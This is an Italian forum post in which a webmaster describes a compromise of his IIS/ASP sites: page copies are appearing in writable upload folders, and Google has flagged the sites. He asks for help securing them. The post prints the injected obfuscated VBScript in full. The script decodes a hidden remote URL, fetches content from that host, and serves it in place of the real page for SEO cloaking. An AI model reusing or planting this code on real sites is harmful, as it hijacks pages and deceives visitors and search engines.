Ciao a tutti ho una grossa problematica di attacco hacker a vari siti web che gestisco in vari server che hanno svariate combinazioni.
Tutti i server che ho utilizzando le versioni windows 2000 - 2003 o addirittura 2012 server e iis dalla versione 6 alla versione 7.5 e sono tutti configurati per utilizzare il linguaggio asp.
In pratica sui siti dove ho delle cartelle con i diritti di scrittura perchè magari quel sito ha un'area riservata dove l'utente carica sul suo sito foto o pdf mi ritrovo dentro delle pagine .asp che sono l'esatta copia di altre pagine che ho sul server (ma esatta copia del codice compreso l'asp) con incollato o subito sotto al tag body o subito prima della chiusura del body questo codice:

codice:
On Error Resume Next
Function brr(c, f)
    dim crr,n,u
    crr=Split(c, "-")
    For n=0 To UBound(crr)
        If crr(n)<>"" Then u=u&Chr(crr(n))
    Next
    If InStr(u, f)=0 Or f="" Then Exit Function
    u=Replace(u, f, "")
    brr=u
End Function
dim fso
Set fso=Server.CreateObject("CDO.Message")
Dim arr(7)
arr(0)=Request.Querystring()
If arr(0)<>"" Then
   arr(1)=Instr(arr(0),brr("42-42-42-42-63-42-42-","*"))
   arr(2)=Instr(arr(0),brr("37-37-37-37-61-37-37-","%"))
   arr(3)=Mid(arr(0),arr(1)+1,arr(2)-arr(1)-1)
   arr(4)=brr("46-104-42-42-116-42-42-109-42-42-108-","*")
   arr(5)=Request.Querystring(arr(3))
   If Instr(arr(5),arr(4))>0 Then arr(4)=""
   arr(6)=brr("94-94-94-94-47-94-94-","^")
   arr(7)=brr("104-116-116-112-58-47-47-119-119-119-46-100-114-100-114-38-101-98-101-97-116-115-46-101-117-47-104-101-105-121-101-47-38-102-105-99-38-101-46-105-116-47-","&")
   fso.CreateMHTMLBody arr(7)&arr(3)&arr(6)&arr(5)&arr(4),31
   Select Case fso.HTMLBody
          Case ""
          Case fso.HTMLBody
               Response.Clear
               Response.Write fso.HTMLBody    
               Response.End                   
   End Select
   Set fso=Nothing  
End If
questo codice asp ovviamente non creato da me e che mi ritrovo incollato dentro queste pagine non fa altro che creare un suo contenuto html che viene "appiccicato" sopra alla pagina originale, così se viene chiamata questa pagina da google il risultato sarà un contenuto completamente diverso rispetto all'originale.
Mi sono accorto della cosa proprio perchè il webmaster tools di google mi ha segnalato la cosa.

Ho controllato nei log e non c'è assolutamente nulla, l'accesso ftp non è stato violato; non so come questo hacker riesce ad accedere alle cartelle con i permessi di scrittura, si riesce a copiare una pagina del sito e ci incolla sopra questo codice.
Ho provato a cercare su internet e per quanto sono riuscito a capire sembra un attacco alla webshell solo che non riesco a capire come difendermi.
Una vulnerabilità di windows o dell'iis mi sembra strano visto che mi capita con svariati sistemi opertaivi e con svariate versioni di iss.
Non posso chiudere tutte le cartelle con i permessi di scrittura altrimenti le aree riservate dei miei clienti si vanno a far benedire e per esempio Aruba ha addiruttura 2 cartelle con i permessi di scrittura sui suoi server (mdb-database e public) e la problematica non accade mai stessa cosa su register.
Unica cosa che accomuna tutti i siti è l'utilizzo dello scripr di lorenzo abbati upload.asp versione 3.1.1 ma non ho trovato nessuna vulnerabilità di questo script che uso da anni.
Qualcuno sai aiutarmi? darmi qualche dritta su dove andare a guardare per risolvere questo problema?
Ahimè google mi segnala giustamente che i siti sono compromessi e il posizionamento crolla.
Grazie a tutti per l'aiuto